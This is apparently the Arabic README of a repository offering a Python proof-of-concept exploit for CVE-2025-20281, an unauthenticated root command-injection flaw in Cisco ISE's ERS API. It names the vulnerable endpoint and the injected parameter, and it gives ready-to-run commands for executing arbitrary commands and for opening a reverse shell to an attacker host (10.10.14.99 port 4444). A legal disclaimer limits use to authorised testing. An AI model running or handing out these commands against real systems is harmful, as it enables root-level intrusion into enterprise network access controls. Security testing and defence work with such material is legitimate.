
استغلال تنفيذ تعليمات برمجية عن بُعد دون مصادقة لـ CVE-2025-20281 في واجهة برمجة تطبيقات ERS التابعة لـ Cisco ISE. تنفيذ أوامر أو إطلاق قذائف عكسية كجذر — دون الحاجة إلى مصادقة.
يحتوي هذا المستودع على استغلال إثبات المفهوم بلغة Python 3 لـ CVE-2025-20281، وهي ثغرة أمنية حرجة في Cisco Identity Services Engine (ISE) تسمح بتنفيذ تعليمات برمجية عن بُعد غير مصادق عليه (RCE) كجذر عبر واجهة ERS API.
يفشل نقطة النهاية
/ers/sdk#_في واجهة ERS الخاصة بـ Cisco ISE في التحقق من المصادقة عند معالجة طلبات إنشاء المستخدم.
عن طريق حقن أوامر shell في معاملnameلكائنInternalUser، يمكن للمهاجمين تحقيق تنفيذ الأوامر كجذر.
--cmd)--whoami--reverse)python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
اختبار الأمر:
python3 CVE-2025-20281.py 192.168.1.10 --whoami
تشغيل أمر مخصص:
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
قذيفة عكسية:
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
⚠️ إخلاء مسؤولية قانوني
هذا الكود مُقدم لأغراض تعليمية واختبارية مرخصة فقط. لا تستخدم هذا البرنامج ضد شبكات أو أنظمة لا تملكها أو ليس لديك إذن لاختبارها.
الثغرة: تم الكشف عنها عبر تنبيه Cisco
إعادة هيكلة الإثبات: illdeed